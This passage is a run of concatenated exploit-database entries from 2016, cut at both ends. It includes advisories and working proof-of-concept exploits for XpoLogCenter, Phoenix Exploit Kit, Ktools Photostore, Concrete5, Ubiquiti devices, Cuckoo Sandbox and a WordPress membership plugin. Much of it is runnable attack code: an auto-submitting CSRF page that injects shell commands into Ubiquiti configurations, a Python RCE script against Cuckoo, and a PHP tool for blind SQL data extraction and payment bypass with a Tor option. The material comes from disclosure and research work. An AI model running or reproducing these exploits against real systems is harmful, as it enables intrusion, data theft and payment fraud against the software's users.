<input type="hidden" name="ajaxTimestamp" value="1465930905166" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
--
exePath = "C:\\windows\\system32\\cmd.exe"
exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
GET
http://10.0.0.17:30303/logeye/testingus.txt
Response:
nt authority\system
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind sql injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
$result = ;
mysqli_num_rows( $result );
$returned_rows = ;
mysqli_fetch_array( $result );
$db_admin_user = ;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
326. public function dispatch(Request $request)
327. {
328. if ($this->installed) {
329. $response = $this->getEarlyDispatchResponse();
330. }
331. if (!isset($response)) {
332. $collection = Route::getList();
333. $context = new \Symfony\Component\Routing\RequestContext();
334. $context->fromRequest($request);
335. $matcher = new UrlMatcher($collection, $context);
336. $path = rtrim($request->getPathInfo(), '/') . '/';
337. try {
338. $request->attributes->add($matcher->match($path));
339. $matched = $matcher->match($path);
340. $route = $collection->get($matched['_route']);
341. Route::setRequest($request);
342. $response = Route::execute($route, $matched);
The vulnerability exists because the path for the incoming request is retrieved using the
"Request::getPathInfo()" method from the Symfony framework, which allows to specify the path
for the request within some HTTP headers (like "X-Original-URL" and some others). So, it might
be possible to specify paths containing "dot-dot-slash" sequences without worrying about URL
encoding and path normalization done by the web server. This could be exploited by unauthenticated
attackers to include arbitrary .php files located outside the Concrete5 root directory or from the
Concrete5 codebase itself (potentially leading to unauthorized access to certain functionalities)
by sending an HTTP request like this:
GET /concrete5/index.php HTTP/1.1
Host: localhost
X-Original-Url: /tools/../../index
Connection: keep-alive
The dispatching process for this request will try to re-include the index.php file,
and this will end up with an unexpected error.
[-] Solution:
Update to a fixed version.
[-] Disclosure Timeline:
[05/05/2015] - Vulnerability details sent through HackerOne
[02/10/2015] - CVE number requested
[19/12/2015] - Vulnerability fixed on the GitHub repository
[26/06/2016] - Vulnerability publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-10
[-] Other References:
https://hackerone.com/reports/59665
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
exectuted with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
-f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token either per session, page, or request. Administration
authorization is solely based on cookie control. Therefore,
it is possible to embed JavaScript into an HTML page so when
an administrator is socially engineered into visiting the page,
the target device will be accessed with privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
In order for a developer to recreate this discovery, the
following instructions should be duplicated.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step 5 from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#######################################################################*
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection
or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED
content = ("""
import subprocess
if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
file.writestr(info, content)
file.close()
data = xmlrpclib.Binary(output.getvalue())
if x.add_analyzer(data):
return x.execute()
if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode
<?php
/**
* Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
* Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password"
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wpindeed.com/
* Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
* Version: 3.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
* Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function isTrue($sql){
global $curl, $options;
$levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
$data = array(
'action'=>'ihc_preview_user_listing',
'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'pay'){
$level = $options['l'];
for($i=$options['s']; $i<$options['e']; $i++){
//This is mental, no IP or Hash check!
echo "Paying Level $level to UserID: $i\n";
$data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
$curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
//echo $curl->getResponse();
}
}
if ($options['m'] == 'sql'){
$query = $options['s'];
echo "'Running' SQL Query: $query\n";
echo "Getting Length";
$max_length = 100;
//Well, it is messed up, can use , (comma) in the query
//Binary search or divide et impera is possible with the BETWEEN operator
//Code it yourself :)
$len = 0;
for ($i=1;$i<$max_length;$i++){
$sql_len = "(select char_length( ($query) ) = $i )";
if (isTrue($sql_len)){
echo "\nLength found: $i\n";
$len = $i;
break;
} else {
echo ".";
}
}
if ($len !== 0 ){
echo "Reading char by char\nResponse:\n";
} else {
die("Failed getting length!\nAboring.\n\n");
}
$charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
for ($i=1;$i<$len;$i++){
$got = false;
for ($j=0;$j<strlen($charset);$j++){
$chr = $charset[$j];
$question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
if (isTrue($question)){
echo $charset[$j];
$got = true;
break;
}
}
if (!$got){
echo "?";
}
}
echo "\n\n";
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
return false;
}
if ($options['m'] == 'sql' && !isset($options['s'])) {
return false;
}
if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
return false;
}
if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
echo "In pay mode -s -e and -l must be numeric!\n";
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
[MODE] sql - Blind SQL Inject mode*
pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
*Note: You can't use , (comma) in the query.
Examples:
php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1
Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.symantec.com
Product:
===========
SEPM
Symantec Endpoint Protection Manager and client v12.1
SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is
the heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.
Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect
CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect
Vulnerability Details:
=====================
The management console for SEPM contains a number of security
vulnerabilities that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploitation attempts of
